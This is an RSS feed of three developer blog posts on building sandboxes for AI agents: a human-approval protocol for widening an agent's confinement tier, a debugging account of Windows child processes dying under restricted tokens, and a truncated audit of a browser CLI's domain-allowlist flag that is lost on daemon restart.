<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: pm25coder</title>
    <description>The latest articles on DEV Community by pm25coder (@pm25coder).</description>
    <link>https://dev.to/pm25coder</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4085808%2F0049b7d1-7772-4584-a8cb-005eb61937ec.png</url>
      <title>DEV Community: pm25coder</title>
      <link>https://dev.to/pm25coder</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/pm25coder"/>
    <language>en</language>
    <item>
      <title>A sandboxed agent asked for one wider tier. The answer had to be a protocol, not a dialog box.</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Wed, 30 Sep 2026 05:18:54 +0000</pubDate>
      <link>https://dev.to/pm25coder/a-sandboxed-agent-asked-for-one-wider-tier-the-answer-had-to-be-a-protocol-not-a-dialog-box-3klb</link>
      <guid>https://dev.to/pm25coder/a-sandboxed-agent-asked-for-one-wider-tier-the-answer-had-to-be-a-protocol-not-a-dialog-box-3klb</guid>
      <description>&lt;p&gt;Our agent runs commands through three confinement tiers: &lt;code&gt;read-only&lt;/code&gt;, &lt;code&gt;workspace-write&lt;/code&gt;, &lt;code&gt;danger-full-access&lt;/code&gt;. The tier a task is configured with is that session's default, and most commands never need anything else.&lt;/p&gt;

&lt;p&gt;But "most" is not "all". Sooner or later a confined call hits something it genuinely cannot do at its tier — a build that has to write outside the workspace, a tool that needs a path the sandbox withholds — and there are only two honest options: fail, or ask a human.&lt;/p&gt;

&lt;p&gt;This is the story of the asking. The feature shipped in one release and broke in two, and the two failures taught more than the feature did.&lt;/p&gt;

&lt;h2&gt;
  
  
  The channel came first, because a question needs somewhere to go
&lt;/h2&gt;

&lt;p&gt;Before this work there was no approval mechanism at all. Searching the server package and the protocol module for &lt;code&gt;approval&lt;/code&gt; or &lt;code&gt;approve&lt;/code&gt; returned &lt;strong&gt;zero hits&lt;/strong&gt;. The three tiers existed; the way to ask for a fourth did not.&lt;/p&gt;

&lt;p&gt;That ordering is not a nicety. Escalation without a channel is not a feature — it is a variable nobody can set. So the first thing built was the question: a request with an id, delivered to the session's subscribers, whose answer resolves exactly one waiting future.&lt;/p&gt;

&lt;h2&gt;
  
  
  A hop, not a jump
&lt;/h2&gt;

&lt;p&gt;The first design decision was to make escalation &lt;em&gt;small&lt;/em&gt;. It is a one-shot widening above the session's default, and it is a strict table rather than a ladder:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;read-only         -&amp;gt;  workspace-write, danger-full-access
workspace-write   -&amp;gt;  danger-full-access
danger-full-access -&amp;gt;  (nothing)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three properties fall out of that table, and all three are load-bearing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;It never writes the default back.&lt;/strong&gt; The widened tier is injected into one call's arguments and nowhere else. The next call stands at the session's configured tier again. There is no state that can drift.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;It cannot cross a session.&lt;/strong&gt; There is no path from one session's grant to another's.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;It is one hop, and "one hop" is not "one step".&lt;/strong&gt; &lt;code&gt;read-only&lt;/code&gt; reaches &lt;code&gt;danger-full-access&lt;/code&gt; directly, because the table's row lists it. What is forbidden is two &lt;em&gt;consecutive&lt;/em&gt; widenings for one call, which is the thing that would let an agent ratchet itself upward.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The tool's schema advertises the whole reachable-in-principle set. The hop table decides what is reachable from where this call actually stands.&lt;/p&gt;

&lt;h2&gt;
  
  
  Fail-closed is an ordering, not an intention
&lt;/h2&gt;

&lt;p&gt;"Refuse unless the human says yes" is easy to write and easy to get wrong, because there are more ways for the question to fail than to succeed. Nobody subscribed. The answer timed out. The answer arrived in a shape nobody could read. The channel itself raised.&lt;/p&gt;

&lt;p&gt;Every one of those is a refusal, and the property only holds because of the order the checks run in:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;The hop table is checked before the channel is consulted.&lt;/strong&gt; A call asking to cross two hops never becomes a question a host could say yes to. The refusal happens before there is anything to approve.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The answer is mapped to a boolean before it is acted on.&lt;/strong&gt; No caller interprets a raw payload.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The timeout — 120 seconds — carries the same reasoning, stated plainly in the source: &lt;em&gt;a host who walked away has not approved anything.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;And one more, which is the subtle one: &lt;strong&gt;a refused escalation does not run the command.&lt;/strong&gt; Running it unwidened would be the wider tier granted by accident — the command would execute, just at the narrower tier, which is exactly what the caller said it could not do. So a refusal is a refusal, not a downgrade.&lt;/p&gt;

&lt;h2&gt;
  
  
  The value being validated is per-call, so the schema cannot validate it
&lt;/h2&gt;

&lt;p&gt;A tool schema is registry-global. The effective sandbox tier is a &lt;strong&gt;per-call fact&lt;/strong&gt; — the daemon injects it into this call's arguments.&lt;/p&gt;

&lt;p&gt;That mismatch is a trap. The schema can check that a requested tier is one of the known names; it cannot check that the name is &lt;em&gt;reachable from where this call stands&lt;/em&gt;. A call running at &lt;code&gt;workspace-write&lt;/code&gt; that asks for &lt;code&gt;read-only&lt;/code&gt; would pass a name-shape check and still be nonsense. So the advertisement and the decision are deliberately split: the schema advertises the target set, and a function — &lt;code&gt;validate_hop&lt;/code&gt; — decides whether &lt;em&gt;this&lt;/em&gt; call may go there.&lt;/p&gt;

&lt;p&gt;If you take one thing from the design: &lt;strong&gt;when the value is per-call and the schema is global, validate at execution.&lt;/strong&gt; The schema is a menu, not a gate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Then the question itself needed a lifecycle
&lt;/h2&gt;

&lt;p&gt;Here is where it broke the first time.&lt;/p&gt;

&lt;p&gt;The approval request was broadcast to the session's clients on the way in, so the clients kept it live — a TUI prompt, a GUI dialog. When nobody answered inside the timeout, the server logged a timeout, returned a refusal, and sent &lt;strong&gt;nothing&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The events a client could observe were never the whole story:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;TUI&lt;/strong&gt; left its pending flag set until the host typed a line. That next line — whatever the host was doing — was then sent as the answer to a request the server had already dropped. The host lost a prompt and was told &lt;code&gt;Refused — the command stays at its default tier&lt;/code&gt;, which was not what happened.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;GUI&lt;/strong&gt; dialog had no timer and no dismissal. It outlived the question and reported an answer nobody accepted.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The fix was to announce &lt;strong&gt;every exit a client can observe&lt;/strong&gt; — approved, refused, timed-out, cancelled — through one helper, with each frame carrying the request id. Two details make it honest:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The frame is &lt;strong&gt;best-effort and never raises&lt;/strong&gt;. The verdict already happened; a client that misses the frame must not turn a refusal into an error for the turn that asked.&lt;/li&gt;
&lt;li&gt;The client &lt;strong&gt;bounds its own pending state independently&lt;/strong&gt;. A server-side frame cannot fix a client that never receives it. The TUI clears its flag on the frame &lt;em&gt;and&lt;/em&gt; on its own clock, because the half of the bug where the host's next line gets swallowed is the client's to fix.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There is also a rule that looks like a detail and is not: &lt;strong&gt;the first answer wins.&lt;/strong&gt; A second client's later reply is dropped rather than racing the first, because a command already running at a wider tier cannot be un-widened by a contrary answer. Late agreement and late objection are both noise once the call is in flight.&lt;/p&gt;

&lt;h2&gt;
  
  
  The release that shipped broken, and the guard that was right
&lt;/h2&gt;

&lt;p&gt;The approval channel went out in a release — and that release crashed the TUI on &lt;strong&gt;every Enter&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The traceback was a &lt;code&gt;UnboundLocalError&lt;/code&gt; on a variable the key handler read and rebound but never declared &lt;code&gt;nonlocal&lt;/code&gt;. In Python a name assigned anywhere in a function body is local unless declared otherwise, so a read in a sibling branch raised on every keystroke that reached it.&lt;/p&gt;

&lt;p&gt;The interesting part is not the bug. It is that the bug class was already mechanised. A script in &lt;code&gt;scripts/&lt;/code&gt; walks the interactive function's nested functions with &lt;code&gt;ast&lt;/code&gt; and reports exactly this: a name written in an inner function, assigned in the outer one, missing from the inner function's &lt;code&gt;nonlocal&lt;/code&gt; list.&lt;/p&gt;

&lt;p&gt;On the released commit, that script returned &lt;strong&gt;exit code 1 with exactly one finding&lt;/strong&gt; — the variable that crashed the client.&lt;/p&gt;

&lt;p&gt;Nothing read it. &lt;code&gt;grep&lt;/code&gt; for the guard's name across &lt;code&gt;.github/workflows/&lt;/code&gt; is empty, and no test in the suite asked the script about the tree the suite lives in; the existing tests exercised its AST helpers and its output encoding. A correct, available verdict sat there like a comment.&lt;/p&gt;

&lt;p&gt;So the hotfix was two changes, not one: the missing declaration, and &lt;strong&gt;wiring the verdict into the suite&lt;/strong&gt; so that the guard's exit code fails something. Deleting the declaration now fails exactly those tests — which is the only proof that a guard is a guard and not a report.&lt;/p&gt;

&lt;p&gt;There is a coda worth writing down, from the same script. Its own docstring records a day it answered about the &lt;em&gt;wrong tree&lt;/em&gt; — a worktree vs. its main checkout — and printed the same &lt;code&gt;OK: nonlocal integrity check passed&lt;/code&gt; line it prints when it is right. A check whose failure and success are indistinguishable by reading its output is worse than a missing check, because it also supplies confidence.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I would tell anyone building this
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Consent is a protocol, not an affordance.&lt;/strong&gt; Define the answer set (yes, no, timed out, cancelled) before you build the dialog. A dialog is one client of the protocol.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fail closed by ordering.&lt;/strong&gt; Check what is askable before you ask; map the answer to a verdict before you act. "Refuse by default" is a claim about code paths, and the order is the proof.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Validate at execution when the value is per-call.&lt;/strong&gt; A schema validates the shape of a value; it cannot validate the position of the caller.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Announce every ending a counterparty can observe.&lt;/strong&gt; A question that ends in silence leaves the counterparty holding state that is now false — and their next action will be taken against it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A guard whose verdict nothing consumes is a report.&lt;/strong&gt; If it returns a failure that fails nothing, you have documentation with an exit code.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;None of this is exotic. It is the ordinary discipline of a long-running process, applied to the one place where being wrong is expensive: the moment an autonomous system asks a human for more power than it was given.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>programming</category>
      <category>opensource</category>
    </item>
    <item>
      <title>My own sandbox was killing my agent's shell, and the exit code hid it</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Thu, 24 Sep 2026 02:38:54 +0000</pubDate>
      <link>https://dev.to/pm25coder/my-own-sandbox-was-killing-my-agents-shell-and-the-exit-code-hid-it-2a7f</link>
      <guid>https://dev.to/pm25coder/my-own-sandbox-was-killing-my-agents-shell-and-the-exit-code-hid-it-2a7f</guid>
      <description>&lt;p&gt;If you run an agent that executes commands, the worst failure is not a broken command. It is a broken shell that still looks like a broken command.&lt;/p&gt;

&lt;p&gt;Here is the whole chain, measured on one Windows Server 2022 host over about a week. Every number below is something I ran, not something I reasoned about.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. The symptom
&lt;/h2&gt;

&lt;p&gt;The agent could not run anything. Every call returned the same thing:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;*** fatal error - couldn't create signal pipe, Win32 error 5
[exit code: 3221225794]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;3221225794&lt;/code&gt; is &lt;code&gt;0xC0000142&lt;/code&gt;, &lt;code&gt;STATUS_DLL_INIT_FAILED&lt;/code&gt;: the program never reached &lt;code&gt;main&lt;/code&gt;, the loader gave up initialising the process image.&lt;/p&gt;

&lt;p&gt;Then the same exit code came back for a bare shell invocation with &lt;strong&gt;no output at all&lt;/strong&gt; - the shell layer itself, not the tools under it. That is the part that made me write this up: the failure class moved up a layer and the surface looked identical.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. The first, wrong hypothesis
&lt;/h2&gt;

&lt;p&gt;A recent release had made the process-boundary shell the default on every platform. On Windows, that shell was spawned as &lt;code&gt;bash -c &amp;lt;command&amp;gt;&lt;/code&gt; - an executable Windows does not have. So every command, including &lt;code&gt;echo ok&lt;/code&gt;, returned &lt;code&gt;[WinError 2]&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The fix was reasonable: mount a shell that exists. PowerShell, on Windows. One dialect per platform, exactly one shell tool registered. That looked like the end.&lt;/p&gt;

&lt;p&gt;It was not, for two reasons only a measurement catches:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the new tool's own description says, in its own words, that it was &lt;em&gt;ported, not verified on Windows hardware&lt;/em&gt;;&lt;/li&gt;
&lt;li&gt;its test file says it is &lt;em&gt;tested by injection, never by spawning&lt;/em&gt;, with a line worth keeping: &lt;strong&gt;"a probe that raises answers 'no' - an unprobeable path is not a spawnable one."&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A suite that never spawns the program cannot tell you the program starts.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Narrowing it: which binaries die
&lt;/h2&gt;

&lt;p&gt;Same host, same tier, six tools against two that worked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;grep.exe / sed.exe / whoami.exe / find.exe / awk.exe / bash.exe
&lt;/span&gt;&lt;span class="gp"&gt;  -&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;fatal error - couldn&lt;span class="s1"&gt;'t create signal pipe, Win32 error 5   (6/6)
&lt;/span&gt;&lt;span class="gp"&gt;git --version   -&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;git version 2.46.0.windows.1                 (works)
&lt;/span&gt;&lt;span class="gp"&gt;gh --version    -&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;gh version 2.58.0                            (works)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The first reading is "some bundled tools are broken." The useful reading is the mechanism. I checked where the runtime lives, one directory at a time:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;msys-2.0.dll&lt;/code&gt; - present in &lt;code&gt;usr\bin&lt;/code&gt;, and &lt;strong&gt;nowhere else&lt;/strong&gt; among &lt;code&gt;usr\bin&lt;/code&gt;, &lt;code&gt;mingw64\bin&lt;/code&gt;, &lt;code&gt;cmd&lt;/code&gt;, &lt;code&gt;bin&lt;/code&gt;, &lt;code&gt;libexec\git-core&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So the class is not "a few tools". It is exactly: &lt;strong&gt;binaries that load the msys2 runtime&lt;/strong&gt;. &lt;code&gt;usr\bin\*.exe&lt;/code&gt; is 244 files; &lt;code&gt;mingw64\bin&lt;/code&gt; is 48 and unaffected. &lt;code&gt;cmd\git.exe&lt;/code&gt;, &lt;code&gt;mingw64\bin\git.exe&lt;/code&gt; and the &lt;code&gt;git&lt;/code&gt; on &lt;code&gt;PATH&lt;/code&gt; all answer.&lt;/p&gt;

&lt;p&gt;And &lt;code&gt;bash.exe&lt;/code&gt; is in the dying set - a small irony worth keeping: the shell the new tool replaced was not merely absent on Windows, it was &lt;em&gt;also&lt;/em&gt; a shell that could not start here.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Why the exit code matters more than the message
&lt;/h2&gt;

&lt;p&gt;The runner has a notion of "the runner itself failed": exit code 127, a signature prefix, a small allow-list. &lt;code&gt;0xC0000142&lt;/code&gt; matches none of it, and the crash text is not in the denial signatures either. So the run is classified as &lt;strong&gt;the command's own failure&lt;/strong&gt; - &lt;code&gt;denied: false&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;That is the real bug. The only shell the agent has is 100% dead, and the reader is shown a crash dump plus &lt;code&gt;[exit code: N]&lt;/code&gt;, which reads as "your command failed." Every retry is then a wasted reasoning step, and nothing in the transcript says the environment is broken.&lt;/p&gt;

&lt;p&gt;An exit code is the one fact that survives dead stdio. Any runner should assert it first and carry it in every failure message - and treat "the child never initialised" as a &lt;em&gt;runner&lt;/em&gt; failure, not a command failure.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. The variable I had not thought to hold constant
&lt;/h2&gt;

&lt;p&gt;The confinement has tiers, and the tier decides what is writable: read-only grants no writable root at all; workspace-write grants the workspace, the temp dir and &lt;code&gt;gettempdir()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;I had been treating the tier as background. It is not. On the same host, with the same binaries, the two tiers give opposite results:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;tier&lt;/th&gt;
&lt;th&gt;non-msys child (&lt;code&gt;pwsh&lt;/code&gt;, &lt;code&gt;git&lt;/code&gt;, &lt;code&gt;python&lt;/code&gt;)&lt;/th&gt;
&lt;th&gt;msys2 child (&lt;code&gt;grep&lt;/code&gt;, &lt;code&gt;sed&lt;/code&gt;, &lt;code&gt;bash&lt;/code&gt;)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;read-only&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;starts&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;dies &lt;code&gt;0xC0000142&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;workspace-write&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;dies &lt;code&gt;0xC0000142&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;dies &lt;code&gt;0xC0000142&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Read that table again, because the second row is the surprising one: under the write-restricted token, &lt;strong&gt;nothing&lt;/strong&gt; starts - not even the shell that had worked all morning. Same exit code, same empty output, no error message.&lt;/p&gt;

&lt;p&gt;Two mechanisms fit every observation, and they stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the msys2 runtime wants a temp area and a &lt;strong&gt;named&lt;/strong&gt; signal pipe before it initialises, and &lt;code&gt;CreateNamedPipe&lt;/code&gt; is not a file - so a policy that grants file paths may never reach it;&lt;/li&gt;
&lt;li&gt;a &lt;code&gt;WRITE_RESTRICTED&lt;/code&gt; token denies at DLL initialisation for children that cannot satisfy their default-object setup, a code the project's own sandbox already documents for restricted-token children.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Which means the honest sentence is narrower than "the sandbox is broken": &lt;strong&gt;the tier, not the tool, decides whether a child process starts at all.&lt;/strong&gt; I could not have found that by reading logs - I found it because the tier moved under me between two rounds with no change on my side, which is also why I now record the tier before every measurement.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. What I would do differently - a checklist
&lt;/h2&gt;

&lt;p&gt;If you run an agent, a CI job, or a sandbox that executes commands on Windows:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Preflight at registration, not per command.&lt;/strong&gt; Spawn a no-op through the mounted shell once. One failing no-op is a clear signal; ten failing commands is noise.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Assert the exit code and put it in the message.&lt;/strong&gt; &lt;code&gt;0xC0000142&lt;/code&gt; next to "your command failed" is actively misleading.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Print &lt;code&gt;PATH&lt;/code&gt; from inside the confined child.&lt;/strong&gt; Mine had &lt;code&gt;usr\bin&lt;/code&gt; on it three times, in a relative spelling no tracked launcher writes - the entry came from an earlier install, which changed both the fix site and the blast radius.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Classify by mechanism, not by tool.&lt;/strong&gt; "Loads the msys2 runtime" predicted all 244 binaries from one presence check; "some tools are broken" predicted nothing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test the thing you resolve.&lt;/strong&gt; If your resolver returns an executable, your suite should spawn &lt;em&gt;that&lt;/em&gt;, once, on every platform. Mocking the spawn tests your mock.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Record the tier with every measurement.&lt;/strong&gt; I lost two rounds of correlation because I did not. A boundary you exercised at one tier is a boundary whose behaviour you do not know.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  7. The honest summary
&lt;/h2&gt;

&lt;p&gt;The layer above the agent - the sandbox - broke the layer below it - the shell - and the result was indistinguishable from user error. What eventually separated them was not cleverness but sequence: reproduce, sample, check for the runtime, read the exit code, and write down which arm you could not run.&lt;/p&gt;

&lt;p&gt;The incident is open: &lt;a href="https://github.com/argszero/emrg/issues/1560" rel="noopener noreferrer"&gt;argszero/emrg#1560&lt;/a&gt; carries the measurements, the class size and the tier caveat, and is where a maintainer can falsify any part of the above. I work on &lt;code&gt;emrg&lt;/code&gt;, a micro-kernel agent that grows its own capabilities - which is also why a broken shell is not a degraded mode for it but a total one: the shell is how it does anything at all.&lt;/p&gt;

&lt;p&gt;If you have seen this exit code under a restricted token, I would like to know whether the named-object reading or the temp-area one fits your host. That is the part I cannot settle from a single machine.&lt;/p&gt;

</description>
      <category>debugging</category>
      <category>ai</category>
      <category>devtools</category>
      <category>testing</category>
    </item>
    <item>
      <title>Sticky in process, gone on restart: auditing the state your CLI daemon keeps in memory</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Sun, 20 Sep 2026 12:54:36 +0000</pubDate>
      <link>https://dev.to/pm25coder/sticky-in-process-gone-on-restart-auditing-the-state-your-cli-daemon-keeps-in-memory-48fb</link>
      <guid>https://dev.to/pm25coder/sticky-in-process-gone-on-restart-auditing-the-state-your-cli-daemon-keeps-in-memory-48fb</guid>
      <description>&lt;p&gt;A containment flag can be wired correctly, tested, documented, and still be a containment flag you do not have. The wiring is only half the story. The other half is where the &lt;strong&gt;baseline&lt;/strong&gt; lives.&lt;/p&gt;

&lt;p&gt;I spent a while reading the source of &lt;a href="https://github.com/vercel-labs/agent-browser" rel="noopener noreferrer"&gt;agent-browser&lt;/a&gt;, a browser-automation CLI that runs as a client plus a long-lived per-session daemon, because a user reported that a containment flag "disappears silently when the daemon restarts". Reading it end to end turned out to be a useful exercise in a failure class that is easy to miss precisely &lt;em&gt;because&lt;/em&gt; the feature works: &lt;strong&gt;state that is sticky for the life of a process and only for the life of a process.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here is the whole audit, with the line numbers I read, and a five-question procedure you can point at any daemon-shaped CLI.&lt;/p&gt;

&lt;h2&gt;
  
  
  The shape: one boundary that is persisted, one that is not
&lt;/h2&gt;

&lt;p&gt;Two flags in this CLI hold the same kind of safety boundary, and they are implemented with two different lifetimes.&lt;/p&gt;

&lt;p&gt;The first is &lt;code&gt;--allowed-domains&lt;/code&gt;, which restricts the browser session to a set of domains. Its inheritance behaviour inside a running daemon is, as far as I can tell, exactly what you would want:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;requested_allowed_domains&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;allowed_domains_from_launch_command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;previous_domain_filter&lt;/span&gt;  &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="py"&gt;.domain_filter&lt;/span&gt;&lt;span class="nf"&gt;.read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="nf"&gt;.clone&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;existing_allowed_domains&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;current_allowed_domains&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;state&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="k"&gt;.await&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;allowed_domains&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requested_allowed_domains&lt;/span&gt;
    &lt;span class="nf"&gt;.clone&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="nf"&gt;.unwrap_or&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;existing_allowed_domains&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;restrict_webrtc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;allowed_domains&lt;/span&gt;&lt;span class="nf"&gt;.is_empty&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;(&lt;code&gt;cli/src/native/actions.rs:4736-4742&lt;/code&gt;.) A later command that omits the flag &lt;strong&gt;inherits&lt;/strong&gt; the adopted filter rather than clearing it, and a launch that fails puts the previous filter back (&lt;code&gt;previous_domain_filter&lt;/code&gt; → &lt;code&gt;restore_domain_filter&lt;/code&gt;, &lt;code&gt;:4737&lt;/code&gt; and &lt;code&gt;:5038&lt;/code&gt;, helper at &lt;code&gt;:3547&lt;/code&gt;). So the "sticky until explicitly dropped" semantic that the report asked for is already the implemented semantic — for a live process.&lt;/p&gt;

&lt;p&gt;What a new process gets instead is the bare environment. &lt;code&gt;DaemonState::new&lt;/code&gt; seeds the filter from one variable:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="n"&gt;domain_filter&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nn"&gt;Arc&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nn"&gt;RwLock&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nn"&gt;env&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;var&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"AGENT_BROWSER_ALLOWED_DOMAINS"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;.ok&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nf"&gt;.filter&lt;/span&gt;&lt;span class="p"&gt;(|&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="nf"&gt;.trim&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="nf"&gt;.is_empty&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
        &lt;span class="nf"&gt;.map&lt;/span&gt;&lt;span class="p"&gt;(|&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nn"&gt;DomainFilter&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
&lt;span class="p"&gt;)),&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



